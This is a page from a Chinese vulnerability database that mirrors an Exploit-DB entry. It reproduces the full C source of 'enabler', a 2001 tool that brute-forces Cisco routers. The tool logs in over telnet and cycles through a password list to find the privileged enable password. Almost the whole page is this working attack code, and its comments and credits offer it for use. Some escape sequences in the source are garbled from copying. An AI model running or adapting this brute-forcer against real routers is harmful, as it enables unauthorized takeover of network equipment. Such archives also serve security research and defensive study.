Cisco – Password Bruteforcer

Cisco – Password Bruteforcer

漏洞ID 1053515 漏洞类型
发布时间 2001-01-19 更新时间 2001-01-19
图片[1]-Cisco – Password Bruteforcer-安全小百科CVE编号 N/A
图片[2]-Cisco – Password Bruteforcer-安全小百科CNNVD-ID N/A
漏洞平台 Hardware CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/254
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*

             .: free source :. .: coded 4 Avatar Corp :.

        enabler.                      
        cisco internal bruteforcer.                    

                                             coder - norby   
                                           concept - anyone

    
  this program just logs into a CISCO router and tries a list of 
  passes looking for the enable one.
  it works in password-only CISCO as well in login-pass ones and 
  has been succesfully tested on many 2600 and a few 12008.
  the prog's concept [bruteforcing a router for gaining enable access] 
  is quite simple ...how amazing I haven't seen similar progs before!

  anti eleet&0day force ;)
  anyway... information wants to be free :) 

                      sciao belli

               saluti a berserker mandarine, acidcrash
               beho x la traduzione :)                                    

          norby
               saluti a *lei*, saluti a gabriella che a capodanno
               non ha voluto lasciare il ragazzo x fare un bambino con me ;) 
               saluti a tutti gli avatar, a sandman, a tutte le diecimila
               persone che conosco
          any
               saluti a Acida, storm, Raid

 contact`    norby - [email protected]      anyone - [email protected]
                www.avatarcorp.org 


neural collapse _ i truly hope in this project

v1 02/10/2k+1
todo for v2: use of threads, implement a passlist recovery 
            (very simple feature)     
*/



#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <signal.h>

#define BOX                     "33[0m33[34;1m[33[0m33[37;1m`33[0m33[34;1m]"

struct sockaddr_in addr;
char host[100];
struct hostent *hp;
int sock_stat;

int n,x;
char **password;

char resolve(char *inputhost) {

    int a,b,c,d;

    if (sscanf(inputhost,"%d.%d.%d.%d",&a,&b,&c,&d) !=4) {
       hp = gethostbyname(inputhost);
       if (hp == NULL) { printf("%s error on host resolvingn33[0mn", BOX); exit(0); }
       sprintf(host,"%d.%d.%d.%d",(unsigned char)hp->h_addr_list[0][0],
                                  (unsigned char)hp->h_addr_list[0][1],
                                  (unsigned char)hp->h_addr_list[0][2],
                                  (unsigned char)hp->h_addr_list[0][3]);
    }
    else { strncpy(host,inputhost,100); }
}
 
int sock(char *hostoresolve,int port) {

    int err;
 
    sock_stat = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sock_stat<0) { printf("%s error opening socketn33[0mn", BOX); exit(0); }

    addr.sin_family = PF_INET;
    addr.sin_port = htons(port);
    addr.sin_addr.s_addr = inet_addr(host);

    err = connect(sock_stat, (struct sockaddr *) &addr, sizeof(addr));
    if (err < 0) { printf("%s error opening connectionn33[0mn", BOX); exit(0); }
}

int banner() {
    printf("n%s enabler.n", BOX); 
    printf("%s         cisco internal bruteforcer. concept by anyonen", BOX); 
    printf("%s                                       coded by norbyn", BOX);
}
int usage(char *argv) { printf("%s usage: %s <ip> [-u user] <pass> <passlist> [port]nn33[0m", BOX, argv); }

void sig() { 
     if(n>0) { printf("%s %i passwords tryed. no password matching. leavingn",BOX,n); }
     printf("n33[0m"); exit(0);
}

int login(char *login, char *pass) {

    char *input = malloc(4000);
    int reqlogin;

    while (read (sock_stat, input, 4000) > 0) {      
     if(strstr(input,"ogin:")||strstr(input,"sername:")) { 
        if(!strcmp(login,"n0login")) { 
          printf("%s username needed... give me a username next time :)nn33[0m", BOX); 
          exit(0);
        }
        printf("%s login requested. sending [%s] and [%s]n", BOX, login, pass); reqlogin=1; break; 
     } 
     if(strstr(input,"assword:")) { printf("%s only password needed. sending [%s]n", BOX, pass); reqlogin=0; break; } 
     bzero(input,4000);
    }

    if(reqlogin==1) {
      write(sock_stat,login,strlen(login)); 
      write(sock_stat,"rn",2);

      while(read(sock_stat,input,4000)>0) {
        if(strstr(input,"assword")); { break; }
      }
    }

    write(sock_stat,pass,strlen(pass)); 
    write(sock_stat,"rn",2);

    sleep(2);

    bzero(input,4000);

    while (read (sock_stat, input, 4000) > 0) {
      if(strstr(input,">")) { printf("%s seems we are logged in :)n", BOX); break; }
  /*    if(strstr(input,"assword:")) {  
        printf("%s sorry... [%s] is not a good password for login :?n33[0mn",BOX,pass); exit(0); 
      }*/ 
      if(strstr(input,"sername:")) {
        printf("%s sorry... [%s] is not a good password for login :?n33[0mn",BOX,pass); exit(0);
      }
      bzero(input,4000);
    }
}

int loadwordlist(char *list) {
 
   FILE   *passlist;
   char   buf[32], fake; 
   int i,z;

   if ((passlist = fopen(list, "r")) == NULL) { 
      printf("%s sorry, unable to open the passlist [%s]n33[0mn", BOX,list); 
      exit(0); 
   }

   (void)fseek(passlist, 0L, SEEK_END);       // cazz questo e' uno smanettamento mentale  
   password = malloc(ftell(passlist));        // per fare allocare solo la memoria giusta x la passlist :P
   if(password == NULL) { 
     printf("%s sorry, can't allocate memory for passlist. buy more ram or cut the passlistn33[0mn",BOX);
     exit(0);
   }  

   (void)fseek(passlist, 0L, SEEK_SET);

   while (!feof(passlist)) {
     fgets(buf, 32, passlist);
     if (buf[0] == '#' || buf[0] == 'n') continue;
     for (i = 0; i < strlen(buf); i++)
         if (buf[i] == 'n') buf[i] = '';
     password[x] = malloc(32);
     strcpy(password[x], buf);
     memset(buf, 0, 32);
     x++;
   }
   password[x] = 0x0;
   fclose(passlist);
   if(x<4) { printf("%s sorry, but passlist must contain at least 3 passwords. leaving n33[0mn",BOX); exit(0); }

}

int brute() {  // there is a stupid error... the last password is tryed 2 times... must be fixed... ;)         
   
   char *input = malloc(100);
   int N;

   bzero(input,100);

   write(sock_stat,"enable",6);
   write(sock_stat,"rn",2);


   while(1) { 

     while(read(sock_stat,input,100)>0) {
       if(n==x) { printf("%s %i passwords tried. no valid password found in the passlistn33[0mn",BOX,n-1); exit(0); }
       if(n+1==x) break;
       if(strstr(input,"assword:")||strstr(input,"#")||strstr(input,">")) break;
       bzero(input,100);
     }
   
     if(strstr(input,"#")) { printf("%s possible password found: %sn33[0mn",BOX,password[n-1]); exit(0); }

     if(strstr(input,"assword:")) {
       write(sock_stat,password[n],strlen(password[n]));
       write(sock_stat,"rn",2);
       n++; 
       bzero(input,100); 
       if(n>1) printf("%s %s... wrong passwordn", BOX, password[n-2]); fflush(stdout); 
       continue;
     } 
     if(strstr(input,">")) {
       write(sock_stat,"enablern",8); bzero(input,100); 
     }
   }
}

int main(int argc, char *argv[]) {

    int port; 
     
    signal(SIGINT, sig);

    banner(); 
    if((argc<=3)||(argc>=8)) { usage(argv[0]); exit(0); }

    if(!strcmp(argv[2],"-u")) {
      if(argc==6) { port=atoi("23"); }
      else { port=atoi(argv[6]); } // c'e' uno stupido errore qua di argc che nn ho voglia di trovare
                                   // c'ho cosetta nella testa :?-- Corretto :) 

      printf("%sn",BOX);

      loadwordlist(argv[5]);
      resolve(argv[1]);
      sock(host, port);
      login(argv[3],argv[4]);
      brute();
    }

    else {
      if(argc==4) { port=atoi("23"); }
      else { port=atoi(argv[4]); }
      printf("%sn",BOX);

      loadwordlist(argv[3]);
      resolve(argv[1]);
      sock(host, port);
      login("n0login",argv[2]);
      brute();
    }
} 


// milw0rm.com [2001-01-19]

相关推荐: IBM Net.Data Buffer Overflow Vulnerability

IBM Net.Data Buffer Overflow Vulnerability 漏洞ID 1104256 漏洞类型 Boundary Condition Error 发布时间 2000-04-04 更新时间 2000-04-04 CVE编号 N/A CN…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享